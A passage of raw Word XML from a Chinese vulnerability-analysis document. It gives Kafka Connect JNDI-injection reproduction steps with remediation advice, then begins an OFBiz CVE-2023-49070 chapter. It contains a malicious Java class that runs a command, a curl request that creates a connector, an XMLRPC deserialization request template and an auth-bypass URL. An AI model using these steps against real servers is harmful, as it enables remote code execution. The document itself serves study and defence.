      </w:r>
    </w:p>
    <w:p w14:paraId="39E59F53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步骤二：准备恶意类</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="391E0905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编写Calc.java，在构造器中执行命令，并编译为</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Calc.class</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="504CE4CD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public class Calc {</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    public </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Calc(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>) throws Exception {</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">        Runtime.getRuntime().exec("touch /tmp/kafka-jndi-success");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30F25A1A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在攻击机的8888端口启动HTTP服务器，确保</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Calc.class</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>可被下载。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C7751D0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步骤三：创建恶意连接器</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="688A8582" w14:textId="77777777" w:rsidR="00DD3943" w:rsidRDefault="001369D1">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>向Kafka</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> Connect REST </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>API发送创建连接器的请求，注入恶意</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>sasl.jaas</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>.config</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2530AA1D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-X POST "http://192.168.1.100:8083/connectors" \</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">  -H "Content-Type: application/json" \</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">  -d @poc.json</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56FAE4DD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注意：连接器名称不能重复，否则返回409 Conflict。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="722AD351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步骤四：验证命令执行</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FF9ACE1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观察LDAP服务器日志，确认收到Kafka Connect的JNDI查询请求；随后检查靶机/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>tmp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>目录是否生成成功标记文件。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="586A27A7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6.6 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>修复建议</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B800B81" w14:textId="77777777" w:rsidR="00DD3943" w:rsidRDefault="001369D1">
      <w:r>
        <w:t xml:space="preserve">① </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>升级至Apache</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> Kafka 3.</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>3.0及以上版本。官方在该版本中对sasl</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>.jaas.config等敏感配置项增加了校验，禁止使用JndiLoginModule等存在JNDI注入风险的LoginModule。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A464BE5" w14:textId="77777777" w:rsidR="00DD3943" w:rsidRDefault="001369D1">
      <w:r>
        <w:t>② 限制Kafka Connect REST API（8083端口）的访问来源，仅允许可信管理节点访问。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75DA9017" w14:textId="77777777" w:rsidR="00DD3943" w:rsidRDefault="001369D1">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>③ 为Kafka Connect启用身份认证，禁止匿名创建连接器。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CD6C4F4" w14:textId="77777777" w:rsidR="00DD3943" w:rsidRDefault="001369D1">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>④ 升级JDK版本至8u191+/11.0.1+，高版本JDK默认限制LDAP远程类加载，可缓解JNDI注入危害。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="364EB58F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0497FE87" w14:textId="77777777" w:rsidR="00DD3943" w:rsidRDefault="001369D1">
      <w:pPr>
        <w:pStyle w:val="1"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>第七章</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">  Apache</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>OfBiz</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>反序列化命令执行漏洞（</w:t>
      </w:r>
      <w:r>
        <w:t>CVE-2023-49070</w:t>
      </w:r>
      <w:r>
        <w:t>）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="560C30C5" w14:textId="77777777" w:rsidR="00DD3943" w:rsidRDefault="001369D1">
      <w:pPr>
        <w:pStyle w:val="21"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">7.1 </w:t>
      </w:r>
      <w:r>
        <w:t>漏洞概述</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CB7EA75" w14:textId="77777777" w:rsidR="00DD3943" w:rsidRDefault="001369D1">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Apache OFBiz（Open </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>For</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> Business）是Apache基金会旗下的开源电子商务平台，提供实体引擎、服务引擎、工作流引擎等组件，用于构建大中型企业级Web应用系统。在OFBiz 17.12.03</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>及以前版本中</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>，/webtools/control/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>xmlrpc接口存在XMLRPC反序列化漏洞</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>官方曾在CVE-2020-9496中对该漏洞进行修复，但修复方式存在绕过，攻击者可通过在URL中添加</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>requirePasswordChange</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>参数绕过补丁限制，继续利用反序列化漏洞执行任意命令，该绕过被编号为CVE-2023-49070。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26AA4BC5" w14:textId="77777777" w:rsidR="00DD3943" w:rsidRDefault="001369D1">
      <w:pPr>
        <w:pStyle w:val="21"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">7.2 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>影响版本</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="6E29800F" w14:textId="77777777" w:rsidR="00DD3943" w:rsidRDefault="001369D1">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:t>Apache OFBiz &lt;= 17.12.03（18.12.10版本彻底删除了xmlrpc接口）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4922A1D4" w14:textId="77777777" w:rsidR="00DD3943" w:rsidRDefault="001369D1">
      <w:pPr>
        <w:pStyle w:val="21"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">7.3 </w:t>
      </w:r>
      <w:r>
        <w:t>代码级成因剖析</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50A72EE3" w14:textId="77777777" w:rsidR="00DD3943" w:rsidRDefault="001369D1">
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体"/>
          <w:b/>
        </w:rPr>
        <w:t>（1）XMLRPC接口与反序列化</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38BE9162" w14:textId="77777777" w:rsidR="00DD3943" w:rsidRDefault="001369D1">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:t>OFBiz的/webtools/control/xmlrpc接口接收XML格式的RPC请求。在处理请求时，OFBiz使用Apache XMLRPC库解析XML内容。当XML中包含&lt;serializable&gt;标签时，XMLRPC库会将标签内的Base64编码数据解码为字节流，并调用Java原生的ObjectInputStream.readObject()进行反序列化。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01DC2B0E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&lt;!-- 恶意XMLRPC请求结构 --&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t>&lt;?xml version="1.0"?&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t>&lt;methodCall&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    &lt;methodName&gt;ProjectDiscovery&lt;/methodName&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    &lt;params&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">        &lt;param&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">            &lt;value&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">                &lt;struct&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">                    &lt;member&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">                        &lt;name&gt;test&lt;/name&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">                        &lt;value&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">                            &lt;serializable xmlns="http://ws.apache.org/xmlrpc/namespaces/extensions"&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">                                [Base64编码的序列化Payload]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">                            &lt;/serializable&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">                        &lt;/value&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">                    &lt;/member&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">                &lt;/struct&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">            &lt;/value&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">        &lt;/param&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    &lt;/params&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t>&lt;/methodCall&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="766C7261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lastRenderedPageBreak/>
        <w:t>（2）CVE-2020-9496的修复方式</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="396CD938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针对CVE-2020-9496，</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>OFBiz</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>官方的修复方式是在</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>xmlrpc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>接口的请求处理流程中增加了密码校验逻辑。只有当请求URL中包含</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>requirePasswordChange</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>=Y参数，且提供了正确的USERNAME和PASSWORD时，才允许访问</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>xmlrpc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>接口。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FD60BFE" w14:textId="77777777" w:rsidR="00DD3943" w:rsidRDefault="001369D1">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
        <w:spacing w:before="80" w:after="80"/>
        <w:ind w:left="283"/>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">// </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>OFBiz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修复后的访问控制逻辑（简化示意）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">public static String </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>xmlrpcRequest</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>HttpServletRequest</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> request, ...) </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    String </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>requirePasswordChange</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>request.getParameter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>("</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>requirePasswordChange</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>");</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    if (!"Y".equals(requirePasswordChange)) {</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">        // 未携带requirePasswordChange=Y，拒绝访问</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">        return "error";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 xml:space="preserve">    String username = request.getParameter("USERNAME");</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    String password = request.getParameter("PASSWORD");</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    // 校验用户名密码...</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>// 校验通过后处理XMLRPC请求</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7196D029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（3）CVE-2023-49070的绕过原理</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41BC9A46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然而，官方的修复存在逻辑缺陷：当USERNAME和PASSWORD为空字符串时，密码校验逻辑会因为"空用户名匹配空密码"而通过。攻击者只需在URL中同时传入空的USERNAME和PASSWORD，以及</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>requirePasswordChange</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>=Y，即可绕过访问控制：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B774020" w14:textId="77777777" w:rsidR="00DD3943" w:rsidRDefault="001369D1">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
        <w:spacing w:before="80" w:after="80"/>
        <w:ind w:left="283"/>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>POST /webtools/control/xmlrpc/?USERNAME=&amp;PASSWORD=&amp;requirePasswordChange=Y HTTP/1.1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:br/>
        <w:t>Host: target:8443</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:br/>
        <w:t>Content-Type: application/xml</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:br/>
        <w:t>[恶意XML内容]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28E3FD85" w14:textId="77777777" w:rsidR="00DD3943" w:rsidRDefault="001369D1">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:t>这样，requirePasswordChange=Y满足了"必须携带该参数"的检查，而空的USERNAME和PASSWORD又通过了密码校验（空对空），最终xmlrpc接口被正常调用，反序列化漏洞被触发。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D818E63" w14:textId="77777777" w:rsidR="00DD3943" w:rsidRDefault="001369D1">
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体"/>
          <w:b/>
        </w:rPr>
        <w:t>（4）利用链：CommonsBeanutils1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E405935" w14:textId="77777777" w:rsidR="00DD3943" w:rsidRDefault="001369D1">
